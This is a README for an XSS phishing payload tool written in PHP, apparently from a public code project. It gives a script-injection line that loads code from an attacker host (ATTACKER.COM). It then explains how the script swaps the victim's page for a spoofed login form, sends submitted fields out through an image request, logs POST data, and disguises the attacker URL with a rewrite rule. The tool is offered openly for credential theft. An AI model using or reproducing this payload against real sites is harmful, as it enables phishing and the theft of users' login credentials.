1. Kyle Osborn
  2. XSS Phishing


XSS Phishing Attack Tool.

This README applies specifically to the PHP version of this script.
There is a Python version which acts the same, but has XML logging.
The Python version does not yet have the same options as the PHP version.

## Explanation

This is no an exploit tool, it's more of a payload tool.
Once you've found the exloit, and you're able to inject javascript,
just stick this in there.


<script src="http://ATTACKER.COM/thebiz.php">

You're pretty much set.

## What exactly this does...

1) The page is loaded with the script inconspicuously place.
2) Once the script is hit, the script will look at the HTTP REFERER
3) With the HTTP REFERER in hand, it uses get_file_contents() to fetch the
   URL [all that is supported at this thime, cURL and Socket will be added later]
4) Since the server doesn't have the authentication that the user does (presumably) the
   server is prompted with a an unauthenticated page, which often contains a form to login.
5) All the returned data is filtered and escaped, making it possibly to embed it into javascript.
6) As soon as the javascript, with the payload, is returned to the user, the browser replaces everything
   in <body> with what was returned within the javascript. Forms are then modified to have the onSubmit="" functoin.
7) When you submit, it loads an image with the input fields as get parameters. sleep() is called (it sucks, gotta replace it.)

## A few things

# Requirements

In php.ini
	allow_url_fopen = On
For now. I'll add in suport for cURL and Socket later.

Proper HTTP Referers sent by the victim. If this is spoofed, or disabled, there will be odd results.

Javascript my be enabled.

By default, the script will grab anything from $_POST and throw it in a file labeled "posts"
Create that file, make ir writeable, but non-readable. Right now there's no functionality to
forward posts from the server spoofed page, but that will change in the future, and adding it 
manually isn't hard.

# Future plans

Expanded support for passing proper browser headers, instead of php headers.
cURL. Socket, because it's probably faster.
Caching. (Save the page, then server that until X minutes/hours/days have passed, then recache it.)

# Anything else?

I suggest using .htaccess, or some other method, to slim down the URL.
|| RewriteRule ^a$ man-just-left-of-middle/thebiz.php
This will make http://ATTACKER.COM/a the script, and it will execute as normal, juts with a rewritten URL.

Will not work with URL redirection, because the HTTP referer is strippid. 

Check the LICENSE file for licensing, GPLv2, etc etc.

WARNING: I have not completely bug tested this against vulns. I might have made a stupid mistake somewhere.
This is also doing some bandwidth intensive actoins (well, compared to none at all.)
Mileage may vary.

## Author

Kyle "Kos" Osborn